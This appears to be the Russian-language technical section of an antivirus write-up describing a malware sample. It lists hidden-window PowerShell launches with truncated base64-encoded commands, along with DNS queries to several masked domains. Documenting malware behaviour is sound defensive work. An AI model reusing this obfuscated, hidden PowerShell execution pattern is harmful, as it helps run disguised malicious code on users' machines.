Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAAVABkAHkAaAB0AGMAagBoAG4AaQB2AHMAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8ASAB5AHoAdgBqAHUAawBhAGwAYwB1ACAAIwA+ACAAJABEAHYAdwBtAGgAdwBiAGIAagBuAHIAPQ...
- DNS ASK sc###sgo.com
- DNS ASK ry###help.com
- DNS ASK de####insight.com
- DNS ASK nh####uanghuy.com
- DNS ASK st###obal.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAAVABkAHkAaAB0AGMAagBoAG4AaQB2AHMAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8ASAB5AHoAdgBqAHUAawBhAGwAYwB1ACAAIwA+ACAAJABEAHYAdwBtAGgAdwBiAGIAagBuAHIAPQ...' (со скрытым окном)